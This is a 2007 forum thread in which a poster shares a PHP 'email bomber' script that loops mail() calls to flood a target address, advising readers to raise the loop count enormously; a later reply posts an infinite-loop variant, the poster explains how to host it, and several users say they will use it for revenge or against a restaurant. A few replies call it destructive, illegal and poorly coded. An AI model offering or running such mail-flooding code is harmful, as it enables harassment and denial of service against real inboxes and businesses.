[PHP] Email Bomber

Discussion in 'Web Programming' started by Waffles, Nov 3, 2007.

[PHP] Email Bomber
  1. Unread #1 - Nov 3, 2007 at 10:31 AM
  2. Waffles
    Referrals:
    4

    Waffles Guest

    [PHP] Email Bomber

    Code:
    <?php
    //Copy Righted Waffles./scheols
    $hackedemail = $_POST['emailhacked'];
    if(isset($_POST['hack'])){
    $hack = 1;
    $user = "FUCKEN GOT HACKED ROTFL";
    while($hack <= 10){
    mail($hackedemail,"Hacked","Fucken Got Pwned", "From: " ."Got Hacked. - ". $user. "<" . $hackedemail . ">\n");
    echo "Hacked";
    $hack++;
    }
    }elseif(!isset($_POST['hack'])){
    ?>
    <form method='post'>
    <input type='text' name='emailhacked'><br>
    <input type='submit' name='hack' value='Hack Person'>
    </form>
    <? } ?>
    while($hack <= 10){

    change 10 to like 100000000000000000000000
     
  3. Unread #2 - Nov 3, 2007 at 11:48 AM
  4. ColZy
    Joined:
    Oct 30, 2007
    Posts:
    213
    Referrals:
    0
    Sythe Gold:
    0

    ColZy Active Member
    Banned

    [PHP] Email Bomber

    what does this do ?..
     
  5. Unread #3 - Nov 3, 2007 at 2:40 PM
  6. Waffles
    Referrals:
    4

    Waffles Guest

    [PHP] Email Bomber

    You can bomb someone's email with it, thus you send 1000000 emails with it to the inbox of the person.
     
  7. Unread #4 - Nov 3, 2007 at 3:30 PM
  8. Tgump
    Joined:
    Jan 21, 2007
    Posts:
    6,541
    Referrals:
    8
    Sythe Gold:
    0
    Two Factor Authentication User

    Tgump Hero
    Retired Global Moderator Zombie

    [PHP] Email Bomber

    WAGGLES

    WTF LONGCAT.

    Lol I will use this. Thanks.
     
  9. Unread #5 - Nov 3, 2007 at 3:37 PM
  10. jackc
    Joined:
    Apr 26, 2007
    Posts:
    1,976
    Referrals:
    1
    Sythe Gold:
    0

    jackc Guru
    Do Not Trade

    [PHP] Email Bomber

    how do you use it? im stupid when it comes to this stuff. if you can tgump, please pm me and tell me how, i wana do this to some restraunt lol...
     
  11. Unread #6 - Nov 3, 2007 at 5:08 PM
  12. Ciz3d
    Joined:
    Oct 9, 2007
    Posts:
    86
    Referrals:
    0
    Sythe Gold:
    0

    Ciz3d Member

    [PHP] Email Bomber

    Can you pm me to is you know how to use it for some explanation :D
    Tyvm
     
  13. Unread #7 - Nov 3, 2007 at 11:00 PM
  14. ColZy
    Joined:
    Oct 30, 2007
    Posts:
    213
    Referrals:
    0
    Sythe Gold:
    0

    ColZy Active Member
    Banned

    [PHP] Email Bomber

    do we put it onto a notepad and save it as a webpage?
     
  15. Unread #8 - Nov 4, 2007 at 1:30 AM
  16. gamer716
    Joined:
    Apr 6, 2007
    Posts:
    490
    Referrals:
    0
    Sythe Gold:
    0

    gamer716 Forum Addict
    Banned

    [PHP] Email Bomber

    confusing but i can use this is get revenge on the ppl i hate
     
  17. Unread #9 - Nov 4, 2007 at 9:29 PM
  18. Nick
    Joined:
    Feb 12, 2007
    Posts:
    7,204
    Referrals:
    40
    Sythe Gold:
    80

    Nick ♬♩ Young Forever ♪ ♫

    [PHP] Email Bomber

    Can you explain a bit more how this works? Thanks
     
  19. Unread #10 - Nov 5, 2007 at 6:25 PM
  20. cp
    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0

    cp an cat
    Banned

    [PHP] Email Bomber

    Please, if you're going to make something destructive, keep it to yourself (or distribute it discreetly).

    People like you are what make the people who code for the general purpose of good look bad.

    Besides, what's the point of copyrighting it? It's badly coded, and requires you to modify the code just to get your desired output.

    Also, this is not hacking (I'm waiting for a reply with something along the lines of "i no it wuznt hackin im just sayin").
     
  21. Unread #11 - Nov 13, 2007 at 6:32 PM
  22. ccaveman
    Joined:
    May 1, 2006
    Posts:
    314
    Referrals:
    0
    Sythe Gold:
    0

    ccaveman Forum Addict

    [PHP] Email Bomber

    i no it wuznt hackin im just sayin.





    or is it? dun dun dun. No it's not.
     
  23. Unread #12 - Nov 13, 2007 at 11:30 PM
  24. xenonium
    Referrals:
    0

    xenonium Guest

    [PHP] Email Bomber

    ok its cool but your hoster will shut down you fast and its easy to track
     
  25. Unread #13 - Nov 30, 2007 at 1:25 AM
  26. Holdom
    Referrals:
    0

    Holdom Guest

    [PHP] Email Bomber

    Ok guys.. you do realize this stuff is Illegal? But use at your own risk. Just wanted to warn ya.
     
  27. Unread #14 - Nov 30, 2007 at 2:02 AM
  28. Annex
    Joined:
    Aug 28, 2005
    Posts:
    2,324
    Referrals:
    3
    Sythe Gold:
    0
    UWotM8?

    Annex Ballin'
    Veteran (Ex-Admin)
    PHP Programmers Retired Administrator

    [PHP] Email Bomber

    Use this on your website at your own discretion, Your host will likely boot you off for spamming, as you will probably be blacklisted for sending such a large amount of emails in the course of a few minutes.
     
  29. Unread #15 - Nov 30, 2007 at 2:32 PM
  30. The_Flames
    Joined:
    Nov 25, 2007
    Posts:
    858
    Referrals:
    3
    Sythe Gold:
    0

    The_Flames Apprentice

    [PHP] Email Bomber

    I cant get it to work :S
     
  31. Unread #16 - Nov 30, 2007 at 4:59 PM
  32. Typhoon
    Joined:
    Jan 21, 2007
    Posts:
    452
    Referrals:
    0
    Sythe Gold:
    0

    Typhoon Forum Addict

    [PHP] Email Bomber

    1 word. NO.
    Code:
    <?php
    $i =1;
    do {
    mail("[email protected]", "subject", "message", "From: [email protected]"); 
    } while ($i > 0);
    ?> 
    
     
  33. Unread #17 - Nov 30, 2007 at 5:17 PM
  34. cp
    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0

    cp an cat
    Banned

    [PHP] Email Bomber

    Yeah typhoon, your destructive code makes you leet.
     
  35. Unread #18 - Dec 1, 2007 at 7:28 AM
  36. Waffles
    Referrals:
    4

    Waffles Guest

    [PHP] Email Bomber

    You can use this email bomber by uploading it to your localhost, or to free website hosting.
     
  37. Unread #19 - Dec 1, 2007 at 2:02 PM
  38. cp
    Joined:
    Jan 30, 2007
    Posts:
    3,278
    Referrals:
    6
    Sythe Gold:
    0

    cp an cat
    Banned

    [PHP] Email Bomber

    You don't upload things to your "localhost". It most likely will not work on a free host because they generally have sendmail disabled.

    And also, I just noticed your copyright on the top of the script, made me lol a bit.
     
  39. Unread #20 - Apr 12, 2009 at 8:30 AM
  40. sathish
    Joined:
    Apr 12, 2009
    Posts:
    1
    Referrals:
    0
    Sythe Gold:
    0

    sathish Newcomer

    [PHP] Email Bomber

    how to do excuite this code tell me
     
< Looking for some help | [PHP] RC4 Encrypted IP Logging >

Users viewing this thread
1 guest


 
 
Adblock breaks this site